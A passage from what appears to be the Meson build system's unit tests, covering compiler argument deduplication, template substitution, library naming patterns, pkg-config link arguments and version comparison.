self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
a = cc.compiler_args(['-I.'])
        # first, check that building up the argument list deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
        # think of this as an assertion; we cannot actually run it, otherwise CompilerArgs would already flush the pending changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
        # then check that, once CompilerArgs already holds a built container list, deduplication keeps the correct occurrence
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class_d(self):
d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch')
# check include order is kept when deduplicating
a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird'])
a += ['-Ifirst']
self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird'])
def test_compiler_args_class_clike(self):
cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
        cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
        cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
        cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
        cmd = ['@INPUT0@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
        cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
        cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
        cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
        cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
        cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
        cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
        cmd = ['@OUTPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
        cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
        cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
        cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
        cmd = ['@OUTPUT1@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
        cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
        cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
        cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
        cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
        cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
dummystate = mock.Mock()
dummystate.subproject = 'dummy'
_mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency)
_mock.pcdep = mock.Mock()
_mock.pcdep.name = "some_name"
_mock.version_reqs = []
_mock = mock.Mock(held_object=_mock)
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([_mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
